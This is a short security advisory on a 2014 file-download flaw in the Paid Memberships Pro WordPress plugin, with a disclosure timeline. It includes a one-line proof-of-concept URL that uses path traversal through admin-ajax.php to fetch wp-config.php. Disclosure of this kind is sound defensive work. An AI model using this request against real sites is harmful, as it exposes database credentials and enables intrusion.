getfile.php is accessible to everyone.
File: paid-memberships-pro\includes\services.php
add_action('wp_ajax_nopriv_getfile', 'pmpro_wp_ajax_getfile');
function pmpro_wp_ajax_getfile()
{
require_once(dirname(__FILE__) . "/../services/getfile.php");
exit;
}
_isadmin() function is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.
So we can download any file.
Proof of Concept
http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
Timeline
- 14-10-2014: Discovered
- 06-11-2014: Vendor notified
- 14-11-2014: Version 1.7.15 released, issue resolved